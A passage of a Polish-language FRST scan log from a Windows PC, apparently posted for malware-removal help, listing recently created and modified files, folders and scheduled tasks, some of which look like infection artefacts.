(AVAST Software) C:\Users\Kratex\Desktop\avast_free_antivirus_setup_offline.exe 2021-08-28 09:46 - 2021-08-28 10:14 - 000000000 ____D C:\Program Files\CCleaner 2021-08-28 09:46 - 2021-08-28 10:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner 2021-08-28 09:46 - 2021-08-28 09:46 - 000003870 _____ C:\Windows\system32\Tasks\CCleaner Update 2021-08-28 09:46 - 2021-08-28 09:46 - 000002824 _____ C:\Windows\system32\Tasks\CCleanerSkipUAC - Kratex 2021-08-28 09:46 - 2021-08-28 09:46 - 000000782 _____ C:\Users\Public\Desktop\CCleaner.lnk 2021-08-27 20:18 - 2021-08-27 20:18 - 836241735 _____ C:\Windows\MEMORY.DMP 2021-08-27 20:18 - 2021-08-27 20:18 - 000416368 _____ C:\Windows\Minidump\082721-22557-01.dmp 2021-08-27 20:11 - 2021-08-27 20:11 - 000003020 _____ C:\Windows\system32\Tasks\{D19E2F49-6973-4414-8465-2E4CE15D9AE0} 2021-08-27 20:11 - 2021-08-27 20:11 - 000003020 _____ C:\Windows\system32\Tasks\{87695F4A-5722-4700-AF20-91F9B74BB394} 2021-08-27 20:06 - 2021-08-28 10:12 - 000003496 _____ C:\Windows\system32\Tasks\ScheduledUpdate 2021-08-27 20:06 - 2021-08-28 10:12 - 000003196 _____ C:\Windows\system32\Tasks\csrss 2021-08-27 20:06 - 2021-08-27 20:06 - 005552360 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe 2021-08-27 20:06 - 2021-08-27 20:06 - 000634272 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe 2021-08-27 20:06 - 2021-08-27 20:06 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2021-08-22 14:49 - 2021-08-22 15:00 - 000000000 ____D C:\Users\Kratex\Desktop\PENDRIVE 2021-08-21 19:00 - 2021-08-21 19:05 - 000041472 _____ C:\Users\Kratex\Desktop\Przelicznik2(1).xls 2021-08-21 18:00 - 2021-08-21 19:08 - 000034816 _____ C:\Users\Kratex\Desktop\plik.xls 2021-08-21 17:47 - 2021-08-21 18:26 - 000008781 _____ C:\Users\Kratex\Desktop\Nowy Arkusz programu Microsoft Excel.xlsx 2021-08-01 21:59 - 2021-08-01 21:59 - 000040557 _____ C:\Users\Kratex\Downloads\skierowanie (1).pdf 2021-08-01 21:59 - 2021-08-01 21:59 - 000040277 _____ C:\Users\Kratex\Downloads\skierowanie.pdf ==================== Jeden miesiąc (zmodyfikowane) ================== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2021-08-28 10:19 - 2009-07-14 06:45 - 000028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2021-08-28 10:19 - 2009-07-14 06:45 - 000028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2021-08-28 10:18 - 2011-04-12 15:21 - 000739694 _____ C:\Windows\system32\perfh015.dat 2021-08-28 10:18 - 2011-04-12 15:21 - 000155268 _____ C:\Windows\system32\perfc015.dat 2021-08-28 10:18 - 2009-07-14 07:13 - 001668226 _____ C:\Windows\system32\PerfStringBackup.INI 2021-08-28 10:18 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf 2021-08-28 10:14 - 2020-09-21 19:56 - 000000000 ____D C:\Program Files (x86)\Google 2021-08-28 10:13 - 2020-09-21 19:40 - 000000000 ____D C:\Users\Kratex\AppData\LocalLow\Mozilla 2021-08-28 10:12 - 2021-01-10 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer 2021-08-28 10:12 - 2020-12-15 11:04 - 000026192 _____ (Windows (R) Server 2003 DDK provider) C:\Windows\gdrv.sys 2021-08-28 10:12 - 2020-09-21 20:44 - 000000000 __SHD C:\Users\Kratex\IntelGraphicsProfiles 2021-08-28 10:12 - 2020-09-21 20:21 - 000000000 ____D C:\ProgramData\NVIDIA 2021-08-28 10:12 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2021-08-28 10:12 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\tracing 2021-08-28 10:11 - 2021-03-14 14:43 - 000000000 ____D C:\ProgramData\FLEXnet 2021-08-28 10:11 - 2021-03-14 12:05 - 000000000 ____D C:\ProgramData\Autodesk 2021-08-28 10:11 - 2020-10-06 22:54 - 000000000 ____D C:\Windows\Minidump 2021-08-28 10:11 - 2020-09-28 17:32 - 000000000 ____D C:\Users\Kratex\AppData\LocalLow\IObit 2021-08-28 10:11 - 2020-09-28 17:32 - 000000000 ____D C:\ProgramData\IObit 2021-08-28 10:11 - 2020-09-25 16:14 - 000000000 ____D C:\Users\Kratex\AppData\Roaming\vlc 2021-08-28 10:11 - 2020-09-21 19:55 - 000000000 ____D C:\Windows\system32\Tasks\Avast Software 2021-08-28 10:11 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\registration 2021-08-28 10:03 - 2020-09-21 19:54 - 000000000 ____D C:\ProgramData\Avast Software 2021-08-28 09:39 - 2020-09-28 17:33 - 000000000 ____D C:\ProgramData\ProductData 2021-08-28 09:37 - 2020-09-24 20:08 - 000000000 ____D C:\Users\Kratex\AppData\Local\AVAST Software 2021-08-27 20:18 - 2020-10-25 22:44 - 000003366 _____ C:\Windows\system32\Tasks\AutoPico Daily Restart 2021-08-27 20:18 - 2020-09-27 22:20 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task 2021-08-27 20:18 - 2020-09-21 19:56 - 000003484 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA 2021-08-27 20:18 - 2020-09-21 19:56 - 000003356 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore 2021-08-27 20:10 - 2020-11-18 18:50 - 000000000 ____D C:\Users\Kratex\Documents\Electronic Arts 2021-08-27 20:09 - 2020-10-03 16:27 - 000000000 ____D C:\Users\Kratex\dwhelper 2021-08-27 20:06 - 2020-12-28 17:21 - 005651052 _____ C:\Windows\ntbtlog.txt 2021-08-25 19:26 - 2020-09-21 20:22 - 000000000 ____D C:\Users\Kratex\AppData\Local\JDownloader 2.0 2021-08-24 21:45 - 2020-09-21 19:55 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update 2021-08-23 19:58 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF 2021-08-22 16:28 - 2021-07-13 19:01 - 000000000 ____D C:\Users\Kratex\Desktop\Materiały inżynierka 2021-08-17 14:49 - 2020-09-21 19:56 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2021-08-14 13:57 - 2020-12-11 17:03 - 000110096 _____ C:\Users\Kratex\Desktop\OPŁATY.xlsx 2021-08-12 21:32 - 2020-07-05 10:45 - 000011811 _____ C:\Users\Kratex\Desktop\Zadymiarze.xlsx 2021-08-07 10:36 - 2020-09-21 20:22 - 000000000 ____D C:\Users\Kratex\AppData\Roaming\uTorrent 2021-08-07 08:58 - 2020-09-21 20:44 - 000000000 ____D C:\Users\Kratex\AppData\Local\BitTorrentHelper 2021-07-31 22:02 - 2021-03-08 20:25 - 000000000 ____D C:\Users\Kratex\AppData\Roaming\dvdcss 2021-07-31 10:49 - 2021-07-15 19:03 - 000002059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk ==================== Pliki w katalogu głównym wybranych folderów ======== 2020-12-28 10:57 - 2020-12-28 10:57 - 000000017 _____ () C:\Users\Kratex\AppData\Local\resmon.resmoncfg ==================== SigCheck ============================ (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) LastRegBack: 2021-08-20 19:03 ==================== Koniec FRST.txt ========================